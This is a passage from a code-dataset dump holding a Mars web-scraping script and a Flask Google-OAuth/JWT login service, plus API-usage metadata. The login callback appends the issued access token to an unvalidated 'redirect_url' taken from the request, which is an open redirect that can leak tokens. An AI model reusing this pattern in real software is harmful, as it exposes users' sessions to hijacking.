{"api_name": "streamlit.sidebar", "line_number": 72, "usage_type": "attribute"}, {"api_name": "plotly.express.bar", "line_number": 76, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 76, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 78, "usage_type": "call"}, {"api_name": "streamlit.sidebar.error", "line_number": 80, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 80, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 85, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 89, "usage_type": "call"}, {"api_name": "pandas.crosstab", "line_number": 89, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 91, "usage_type": "call"}, {"api_name": "plotly.express.box", "line_number": 95, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 95, "usage_type": "name"}, {"api_name": "plotly.express.box", "line_number": 97, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 97, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 100, "usage_type": "call"}, {"api_name": "plotly.express.histogram", "line_number": 103, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 103, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 106, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 110, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 131, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 133, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 141, "usage_type": "call"}, {"api_name": "seaborn.distplot", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 146, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 150, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 151, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 152, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 154, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 154, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Pie", "line_number": 155, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 155, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 158, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 178, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 179, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 180, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 181, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 182, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_validate", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 186, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 191, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 194, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 195, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 204, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 204, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 208, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 213, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 217, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 222, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 222, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.file_uploader", "line_number": 228, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 228, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 232, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 232, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.slider", "line_number": 234, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 234, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 238, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 238, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 239, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 239, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 244, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 244, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 247, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 247, "usage_type": "attribute"}, {"api_name": "streamlit.write", "line_number": 248, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 250, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 250, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.warning", "line_number": 253, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 253, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 256, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 256, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 257, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 257, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.text_input", "line_number": 259, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 259, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.text_input", "line_number": 261, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 261, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 263, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 263, "usage_type": "attribute"}, {"api_name": "streamlit.write", "line_number": 266, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 274, "usage_type": "call"}, {"api_name": "streamlit.sidebar.info", "line_number": 277, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 277, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 281, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 281, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 285, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 285, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.number_input", "line_number": 288, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 288, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 289, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 289, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 293, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 293, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.multiselect", "line_number": 297, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 297, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 300, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 300, "usage_type": "attribute"}, {"api_name": "streamlit.success", "line_number": 301, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 306, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 306, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.multiselect", "line_number": 327, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 327, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.warning", "line_number": 339, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 339, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 342, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 342, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 343, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 343, "usage_type": "attribute"}, {"api_name": "pandas.get_dummies", "line_number": 348, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 350, "usage_type": "call"}, {"api_name": "streamlit.sidebar.write", "line_number": 353, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 353, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 356, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 360, "usage_type": "call"}, {"api_name": "streamlit.sidebar.write", "line_number": 362, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 362, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.warning", "line_number": 364, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 364, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 368, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 368, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.slider", "line_number": 372, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 372, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 375, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 375, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 379, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 379, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 391, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 391, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 396, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 396, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 401, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 401, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 406, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 406, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 411, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 411, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 416, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 416, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 420, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 420, "usage_type": "attribute"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 421, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 424, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 426, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 428, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 434, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 438, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 442, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 444, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 452, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 453, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 458, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 458, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 459, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 464, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 464, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 469, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 469, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 474, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 474, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 479, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 479, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 484, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 484, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 489, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 489, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 494, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 494, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 498, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 498, "usage_type": "attribute"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 499, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 502, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 504, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 506, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 512, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 516, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 521, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 523, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 531, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 532, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 537, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 537, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 538, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 542, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 542, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 547, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 547, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 552, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 552, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 557, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 557, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 561, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 561, "usage_type": "attribute"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 562, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 565, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 567, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 569, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 575, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 579, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 584, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 586, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 594, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 595, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 600, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 600, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 601, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 605, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 605, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 610, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 610, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 615, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 615, "usage_type": "attribute"}, {"api_name": "streamlit.error", "line_number": 621, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 624, "usage_type": "call"}, {"api_name": "streamlit.sidebar.button", "line_number": 628, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 628, "usage_type": "attribute"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 629, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 632, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 635, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 637, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 643, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 647, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 652, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 654, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 662, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 663, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 667, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 667, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 667, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 671, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 675, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 675, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 680, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 680, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 685, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 685, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 689, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 689, "usage_type": "attribute"}, {"api_name": "sklearn.svm.SVC", "line_number": 690, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 693, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 695, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 697, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 703, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 707, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 712, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 714, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 722, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 723, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 725, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 725, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 726, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 732, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 736, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 737, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 755, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 756, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 756, "usage_type": "call"}, {"api_name": "sklearn.model_selection.learning_curve", "line_number": 758, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 758, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 761, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 761, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 762, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 762, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 763, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 763, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 764, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 764, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 765, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 765, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 767, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 767, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 768, "usage_type": "call"}]} +{"seq_id": "29057862793", "text": "from bs4 import BeautifulSoup as bs\nimport pandas as pd\nfrom splinter import Browser\nimport requests\n\n#define function to intiate \"light\" browser for nav\ndef init_browser():\n executable_path = {'executable_path':'chromedriver.exe'}\n browser = Browser('chrome',**executable_path, headless=False)\n\n return browser\n\n\n#define the scrape function\ndef scrape():\n\n #### Get news title and body ####\n\n # Get page HTML into a Soup\n browser = init_browser()\n url_to_scrape = \"https://redplanetscience.com/\"\n browser.visit(url_to_scrape)\n html = browser.html\n soup = bs(html,'html.parser')\n\n # Get all news items\n news_items = soup.find_all('div', class_='list_text')\n\n news_title = news_items[0].find('div', class_='content_title').text\n news_p = news_items[0].find('div', class_='article_teaser_body').text\n\n #### Get Featured Image ####\n\n # Get page HTML into a Soup\n url = \"https://spaceimages-mars.com/\"\n browser.visit(url)\n html = browser.html\n soup = bs(html,'html.parser')\n #assing source url to variable\n featured_image_url = soup.find_all('img', class_='headerimage fade-in')[0][\"src\"]\n\n #### Get Table ####\n\n # Get page HTML into a Soup\n url = \"https://galaxyfacts-mars.com/\"\n tables = pd.read_html(url)\n #scrape to pd.dataframe\n df2 = tables[1]\n #assign column headers\n df2.columns = [\"Mars\", \"Value\"]\n #convert to html\n mars_html_table = df2.to_html()\n\n #### Get Hemispheres ####\n\n # Get page HTML into a Soup\n url = 'https://marshemispheres.com/'\n browser.visit(url)\n html = browser.html\n soup = bs(html, 'html.parser')\n # Get all news items\n hemispheres = soup.find_all('div', class_='item')\n #create empty list to append dictionaries\n hemisphere_image_urls = []\n #loop through each iteration of hemispheres\n for hemisphere in hemispheres:\n\n hemisphere = hemisphere.find('div', class_=\"description\")\n #Get title\n title = hemisphere.h3.text\n #Assign sub-url for page nav\n link = hemisphere.a[\"href\"]\n #navigate\n browser.visit(url + link)\n # Get page HTML into a Soup\n html = browser.html\n soup = bs(html, 'html.parser')\n #Get image url\n image_link = soup.find('div', class_='downloads')\n image_url = image_link.find('li').a[\"href\"]\n #create dictionary to hold values\n image_dict = {}\n #add values\n image_dict['title'] = title\n image_dict['img_url'] = image_url\n #append to list\n hemisphere_image_urls.append(image_dict)\n #trim variable\n hemisphere_images = hemisphere_image_urls\n\n # Store data in dictionary\n mars_dict = {\n \"news_title\": news_title,\n \"news_p\": news_p,\n \"featured_image_url\": featured_image_url,\n \"table\": str(mars_html_table),\n \"hemisphere_images\": hemisphere_images\n }\n\n # Return results\n return mars_dict\n", "repo_name": "Squonk713/Web-Scraping-Challenge", "sub_path": "mars_scrape2.py", "file_name": "mars_scrape2.py", "file_ext": "py", "file_size_in_byte": 3019, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "splinter.Browser", "line_number": 9, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 24, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 46, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 60, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "39135345334", "text": "from flask import url_for, request\nfrom flask_dance.contrib.google import google\nfrom flask_jwt_extended import JWTManager, create_access_token, get_jwt_identity\nfrom flask import session\nfrom os import getenv\nfrom extensions import db\nfrom models.user import User\nfrom models.candidate import Candidate\nfrom models.employer import Employer\nfrom models.job_post import JobPost\n\nclass AuthService:\n\t@staticmethod\n\tdef google_login():\n\t\t# Get `type` query param\n\t\tuser_type = request.args.get('type')\n\t\t# Save user type in session\n\t\tif user_type:\n\t\t\tsession['user_type'] = user_type\n\t\t# Return google login url\n\t\treturn url_for('google.login')\n\n\t@staticmethod\n\tdef google_login_callback():\n\t\ttry:\n\t\t\tif not google.authorized:\n\t\t\t\treturn url_for('google.login')\n\n\t\t\taccount_info = google.get('/oauth2/v2/userinfo')\n\t\t\tif account_info.ok:\n\t\t\t\taccount_info_json = account_info.json()\n\t\t\t\temail = account_info_json['email']\n\t\t\t\t# Check if user is in database\n\t\t\t\tuser = User.query.filter_by(email=email).first()\n\t\t\t\tif not user:\n\t\t\t\t\t# Create user \n\t\t\t\t\tname = account_info_json['name']\n\t\t\t\t\t# Split name into first and last name\n\t\t\t\t\tname_split = name.split(' ')\n\t\t\t\t\tfirst_name = name_split[0]\n\t\t\t\t\tlast_name = name_split[-1]\n\t\t\t\t\t# Get user type from session\n\t\t\t\t\tuser_type = session.get('user_type') or None\n\t\t\t\t\tif not user_type:\n\t\t\t\t\t\treturn {'error': 'User type not found'}\n\t\t\t\t\t\n\t\t\t\t\tif user_type == 'candidate':\n\t\t\t\t\t\tuser = Candidate(\n\t\t\t\t\t\t\temail=email,\n\t\t\t\t\t\t\tfirst_name=first_name,\n\t\t\t\t\t\t\tlast_name=last_name\n\t\t\t\t\t\t)\n\t\t\t\t\telif user_type == 'employer':\n\t\t\t\t\t\tuser = Employer(\n\t\t\t\t\t\t\temail=email,\n\t\t\t\t\t\t\tfirst_name=first_name,\n\t\t\t\t\t\t\tlast_name=last_name\n\t\t\t\t\t\t)\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn {'error': 'Invalid user type'}\n\t\t\t\t\t# Add user to database\n\t\t\t\t\tdb.session.add(user)\n\t\t\t\t\tdb.session.commit()\n\t\t\t\t# Create JWT token\n\t\t\t\taccess_token = create_access_token(identity=email)\n\t\t\t\t# Return url to frontend with JWT token\n\t\t\t\tredirect_url = request.args.get('redirect_url') or getenv('FRONTEND_URL')\n\t\t\t\treturn f'{redirect_url}?token={access_token}'\n\t\t\telse:\n\t\t\t\treturn {'error': 'Failed to fetch user info'}\n\t\texcept Exception as e:\n\t\t\treturn {'error': str(e)}\n\t\t\n\t@staticmethod\n\tdef user_data():\n\t\ttry:\n\t\t\tuser_email = get_jwt_identity()\n\t\t\tuser = User.query.filter_by(email=user_email).first()\n\t\t\tif user:\n\t\t\t\t# Get company_id from employer model if user is employer\n\t\t\t\tif user.type == 'employer':\n\t\t\t\t\temployer = Employer.query.filter_by(id=user.id).first()\n\t\t\t\t\tdata = employer.serialize()\n\t\t\t\t\tdata['id'] = user.id\n\t\t\t\t\tdata['type'] = user.type\n\t\t\t\t\t# Add job posts to data\n\t\t\t\t\tjob_posts = JobPost.query.filter_by(employer_id=user.id).all()\n\t\t\t\t\tdata['job_posts'] = [job_post.serialize() for job_post in job_posts]\n\t\t\t\t\treturn data\n\t\t\t\telif user.type == 'candidate':\n\t\t\t\t\tcandidate = Candidate.query.filter_by(id=user.id).first()\n\t\t\t\t\tdata = candidate.serialize()\n\t\t\t\t\tdata['id'] = user.id\n\t\t\t\t\tdata['type'] = user.type\n\t\t\t\t\treturn data\n\t\t\telse:\n\t\t\t\treturn {'error': 'User not found'}\n\t\texcept Exception as e:\n\t\t\tprint('Error', e)\n\t\t\treturn {'error': str(e)}\n\n\t\t", "repo_name": "WaleedAhmed05/GoldenBullets-Soen6011summer2023", "sub_path": "backend/app/services/auth.py", "file_name": "auth.py", "file_ext": "py", "file_size_in_byte": 3071, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.request.args.get", "line_number": 16, "usage_type": "call"}, {"api_name": 